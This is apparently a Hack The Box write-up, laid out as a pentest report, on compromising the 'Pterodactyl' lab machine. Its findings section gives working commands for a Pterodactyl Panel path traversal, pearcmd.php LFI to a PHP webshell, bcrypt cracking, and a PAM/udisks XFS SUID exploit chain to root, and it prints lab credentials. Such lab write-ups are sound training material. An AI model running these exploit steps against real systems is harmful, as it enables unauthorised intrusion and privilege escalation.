HTB - Pterodactyl
Path traversal in Pterodactyl Panel leaks database credentials. Pearcmd LFI converts to RCE, bcrypt hash cracking gives SSH access, then CVE-2025-6019 (udisks XFS resize without nosuid) escalates to root.
Hack The Box — Pterodactyl
Hard | openSUSE Leap 15.6 | Hack The Box
| Field | Value |
|---|---|
| Report Date | 12 February 2026 |
| Assessed By | RobInTheHood |
| Target IP | 10.129.2.124 |
| Hostname | panel.pterodactyl.htb |
| Domain | PTERODACTYL.HTB |
Table of Contents
- Executive Summary
- Scope
- Methodology
- Attack Chain Summary
- Findings
- Proof of Access
- Credentials Discovered
- Impact Assessment
- Remediation Summary
- Key Takeaways
- Tools Used
- Disclaimer
1. Executive Summary
This report documents the compromise workflow for the Hack The Box machine Pterodactyl. The objective was to obtain full system-level access in an authorised lab environment and document the attack path with reproducible evidence.
Path traversal in Pterodactyl Panel leaks database credentials. Pearcmd LFI converts to RCE, bcrypt hash cracking gives SSH access, then CVE-2025-6019 (udisks XFS resize without nosuid) escalates to root.
2. Scope
| Field | Value |
|---|---|
| Target IP | 10.129.2.124 |
| Hostname | panel.pterodactyl.htb |
| Domain | PTERODACTYL.HTB |
| Operating System | openSUSE Leap 15.6 |
| Machine Rating | Hard |
| Environment | Hack The Box — Authorised Training Lab |
| Assessment Date | 12 February 2026 |
| Assessor | RobInTheHood |
3. Methodology
- Reconnaissance — service discovery and external attack-surface mapping
- Enumeration — credential, configuration, and trust-path analysis
- Exploitation — initial access through validated vulnerability paths
- Lateral Movement — privilege pivoting and cross-context execution
- Privilege Escalation — full compromise to root/SYSTEM context
- Post-Exploitation — proof collection and impact-oriented validation
4. Attack Chain Summary
| Phase | Technique | MITRE ATT&CK |
|---|---|---|
| Recon | Nmap, vhost enumeration | T1046 · T1595.002 |
| Info Gathering | changelog.txt + phpinfo.php + CVE-2025-49132 path traversal → DB creds | T1083 · T1190 |
| Initial Access | pearcmd.php LFI-to-RCE (webshell as wwwrun) | T1190 · T1505.003 |
| Lateral Movement | MariaDB query → bcrypt hashes, john crack → SSH as phileasfogg3 | T1110.002 · T1021.004 |
| Privilege Escalation | CVE-2025-6018 (PAM fake seat) + CVE-2025-6019 (udisks XFS nosuid) → SUID bash → root | T1548.001 |
5. Findings
F-01 — Technical Walkthrough
Reconnaissance
| Port | Service |
|---|---|
| 22 | OpenSSH 9.6 |
| 80 | nginx 1.21.5 |
Virtual host enumeration reveals:
| Vhost | Description |
|---|---|
| pterodactyl.htb | MonitorLand — Minecraft community site |
| panel.pterodactyl.htb | Pterodactyl Panel v1.11.10 |
Information Gathering
changelog.txt on the main site discloses PHP-PEAR is installed and phpinfo() is temporarily exposed. phpinfo.php confirms disable_functions and open_basedir are both empty, and register_argc_argv = On.
CVE-2025-49132 — Path Traversal Config Leak
The Panel’s /locales/locale.json endpoint includes arbitrary PHP config files via a locale path traversal:
GET /locales/locale.json?locale=..%2f..%2fconfig&namespace=database&hash=1932da4d5c6Extracted credentials:
- MariaDB:
pterodactyl:PteraPanelon127.0.0.1:3306 - APP_KEY:
base64:UaThTPQnUjrrK61o+Luk7P9o4hM+gl4UiMJqcbTSThY=(AES-256-CBC) - Session driver: Redis (DB 1), cookie encrypted with APP_KEY
Initial Access — pearcmd.php LFI → RCE
PHP-PEAR’s pearcmd.php processes PEAR commands from query-string arguments when register_argc_argv is on. The path traversal includes it directly:
# Step 1: write a webshell via PEAR config-create
curl --request-target '/locales/locale.json?locale=../../../../../usr/share/php/PEAR&namespace=pearcmd&hash=1932da4d5c6&+config-create+/<?=system($_GET["c"])?>+/tmp/cmd2.php' 'http://panel.pterodactyl.htb/'
# Step 2: include the webshell for RCE
curl -sG 'http://panel.pterodactyl.htb/locales/locale.json' --data-urlencode 'locale=../../../../../tmp' --data-urlencode 'namespace=cmd2' --data-urlencode 'hash=1932da4d5c6' --data-urlencode 'c=id'Result: uid=474(wwwrun) gid=477(www)
Lateral Movement — wwwrun → phileasfogg3
From the webshell, query the MariaDB:
mariadb -u pterodactyl -pPteraPanel -h 127.0.0.1 panel -e "SELECT username,password FROM users;"| Username | Hash |
|---|---|
| phileasfogg3 | $2y$10$PwO0TBZA8hLB6nuSsxRqoO... |
| headmonitor | $2y$10$3WJht3/5GOQmOXdljPbAJe... |
john --wordlist=/usr/share/wordlists/rockyou.txt hashes_bcrypt.txt
# phileasfogg3: !QAZ2wsxssh phileasfogg3@pterodactyl.htbUser flag: cat /home/phileasfogg3/user.txt
Privilege Escalation — CVE-2025-6019 (udisks XFS nosuid bypass)
sudo -l shows (ALL) ALL with Defaults: targetpw, blocking sudo without root’s password.
CVE-2025-6018 — Faking a physical polkit session via PAM:
pam_env reads ~/.pam_environment before pam_systemd processes XDG_SEAT/XDG_VTNR. Injecting these makes polkit treat the SSH session as allow_active, enabling udisksctl loop-setup without authentication:
echo 'XDG_SEAT OVERRIDE=seat0' > ~/.pam_environment
echo 'XDG_VTNR OVERRIDE=1' >> ~/.pam_environment
# Reconnect via SSH for PAM to applyCVE-2025-6019 — XFS resize mounts without nosuid:
When resizing an XFS filesystem, libblockdev temporarily mounts it in /tmp without the nosuid flag. A SUID binary placed in the image executes as root.
# On attacker: craft malicious XFS image
dd if=/dev/zero of=./xfs.image bs=1M count=300 && mkfs.xfs ./xfs.image
sudo mount -t xfs ./xfs.image ./xfs.mount && sudo cp /bin/bash ./xfs.mount/ && sudo chmod 04555 ./xfs.mount/bash && sudo umount ./xfs.mount
scp ./xfs.image phileasfogg3@pterodactyl.htb:/tmp/xfs.image
# On target
udisksctl loop-setup --file /tmp/xfs.image --no-user-interaction
# Keep mount busy while requesting resize
while true; do /tmp/blockdev*/bash -c 'sleep 10' && break; done &
gdbus call --system --dest org.freedesktop.UDisks2 --object-path /org/freedesktop/UDisks2/block_devices/loop0 --method org.freedesktop.UDisks2.Filesystem.Resize 0 '{}'
# Mount remains due to busy target
/tmp/blockdev*/bash -pRoot flag: cat /root/root.txt
6. Proof of Access
| Level | Evidence |
|---|---|
| User | cat /home/phileasfogg3/user.txt |
| Root | cat /root/root.txt |
7. Credentials Discovered
| Account | Secret | Type | Source |
|---|---|---|---|
| See Findings | Documented inline | Mixed | Commands and evidence blocks in section 5 |
8. Impact Assessment
Successful exploitation resulted in high-impact host compromise and demonstrated practical attacker control across the full kill chain for this target.
9. Remediation Summary
| Priority | Action |
|---|---|
| High | Patch exploitable service components and remove unsafe defaults. |
| High | Restrict writable paths and high-risk ACL/delegation rights. |
| Medium | Enforce credential hygiene, rotation, and secret exposure controls. |
| Medium | Add detections for attacker tradecraft used in section 5. |
10. Key Takeaways
- Small configuration weaknesses can chain into full host compromise.
- Credential exposure and trust relationships are critical escalation multipliers.
- Reproducible testing and evidence-driven reporting improve remediation quality.
11. Tools Used
| Tool | Purpose |
|---|---|
nmap | Used during enumeration/exploitation workflow. |
gobuster | Used during enumeration/exploitation workflow. |
john | Used during enumeration/exploitation workflow. |
gdbus | Used during enumeration/exploitation workflow. |
12. Disclaimer
This assessment was performed exclusively in an authorised Hack The Box training environment for educational and portfolio purposes.
End of Report — Pterodactyl | RobInTheHood | 12 February 2026